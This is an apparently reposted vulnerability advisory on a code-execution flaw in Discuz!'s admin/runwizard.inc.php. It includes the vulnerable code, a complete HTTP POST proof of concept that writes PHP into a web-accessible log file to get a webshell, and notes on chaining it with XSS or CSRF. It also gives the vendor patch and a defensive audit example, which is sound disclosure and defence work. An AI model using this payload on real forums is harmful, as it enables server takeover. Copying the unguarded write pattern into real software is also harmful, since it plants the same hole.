Discuz! admin/runwizard.inc.php Vulnerability Exploitation (Get Webshell)
Source: Internet  Published: python 金字塔  Editor: 程序博客网  Time: 2024/06/13 12:50
Because the file-writing operation in saverunwizardhistory() in Discuz!'s admin/runwizard.inc.php is not restricted, it leads to a code-execution vulnerability.
1. Analysis
The code in admin/runwizard.inc.php reads:
$runwizardhistory = array();
// the history log is a .php file inside the web root
$runwizardfile = DISCUZ_ROOT.'./forumdata/logs/runwizardlog.php';
if($fp = @fopen($runwizardfile, 'r')) {
    $runwizardhistory = @unserialize(fread($fp, 99999));
    fclose($fp);
}
.......
if(submitcheck('step1submit')) {
    // submitted form values are stored as-is, without any filtering
    $runwizardhistory['step1']['size'] = $size;
    $runwizardhistory['step1']['safe'] = $safe;
    $runwizardhistory['step1']['func'] = $func;
    saverunwizardhistory();
}
........
function saverunwizardhistory() {
    global $runwizardfile, $runwizardhistory;
    $fp = fopen($runwizardfile, 'w');
    // the serialized values are written verbatim into the .php file, with no guard in front
    fwrite($fp, serialize($runwizardhistory));
    fclose($fp);
}
The code above shows that, with admin-panel privileges, one can directly obtain a webshell. Combined with XSS [e.g. SODB-2008-01, SODB-2008-02, etc.] or CSRF [e.g. SODB-2008-03] vulnerabilities, a webshell can be written remotely under the admin's identity to execute code.
2. Exploitation
PoC:
POST /bbs/admincp.php?action=runwizard&step=3 HTTP/1.1
Host: www.80vul.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.80vul.com/bbs/admincp.php?action=runwizard&step=2
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
formhash=a1ae055f&anchor=&settingsnew%5Bbbname%5D=%3C%3Fphpinfo%28%29%3B%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%CF%C2%D2%BB%B2%BD
Webshell:
http://www.80vul.com/bbs/forumdata/logs/runwizardlog.php
3. Patch
The Discuz! 7 beta version [1] released today has already fixed this vulnerability:
function saverunwizardhistory() {
    global $runwizardfile, $runwizardhistory;
    $fp = fopen($runwizardfile, 'w');
    // a guard is prepended so that a direct request to the log file exits before the serialized data
    $s = '<?php exit;?>';
    $s .= serialize($runwizardhistory);
    fwrite($fp, $s);
    fclose($fp);
}
Patch download address: http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip
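The guarded write above only fixes the writer; the reader must strip the guard again or unserialize() returns false. The following is an added example, not Discuz!'s own code: the guarded write, its matching read, and an audit check that flags an existing runwizardlog.php written by the unpatched function. Function names and the temp-file path are assumptions for illustration.

```php
<?php
// Added example, not Discuz!'s own code: the guarded write from the patch
// above, the matching read, and an audit check for an existing log file.
// The function names and the temp-file path are assumptions for illustration.
define('RUNWIZARD_GUARD', '<?php exit;?>');

// Write the history with the guard in front: a direct HTTP request for the
// .php file runs exit; before the serialized data, so nothing after it executes.
function save_runwizard_history($file, array $history) {
    $data = RUNWIZARD_GUARD . serialize($history);
    return file_put_contents($file, $data, LOCK_EX) !== false;
}

// Read it back. unserialize() on the raw file would return false because of
// the prefix, so strip it first (on PHP 7+ also pass array('allowed_classes' => false)).
function load_runwizard_history($file) {
    if (!is_file($file)) {
        return array();
    }
    $raw = file_get_contents($file);
    if (strpos($raw, RUNWIZARD_GUARD) === 0) {
        $raw = substr($raw, strlen(RUNWIZARD_GUARD));
    }
    $history = @unserialize($raw);
    return is_array($history) ? $history : array();
}

// Audit check: a log without the guard that contains a PHP open tag was
// written by the unpatched saverunwizardhistory() with tag-bearing settings,
// so treat it as a possible webshell and inspect it.
function runwizard_log_status($file) {
    if (!is_file($file)) {
        return 'missing';
    }
    $raw = file_get_contents($file);
    if (strpos($raw, RUNWIZARD_GUARD) === 0) {
        return 'guarded';
    }
    return strpos($raw, '<?') !== false ? 'suspicious' : 'unguarded';
}

// Demo with a constructed history written to a temporary file.
$tmp = tempnam(sys_get_temp_dir(), 'rwz');
$history = array('step1' => array('size' => 'medium', 'safe' => 1, 'func' => 'fast'));
save_runwizard_history($tmp, $history);
var_dump(load_runwizard_history($tmp) === $history);
echo runwizard_log_status($tmp), "\n";
unlink($tmp);
```

Storing the history outside the document root, or in a file the web server will never execute, removes the need for the guard altogether.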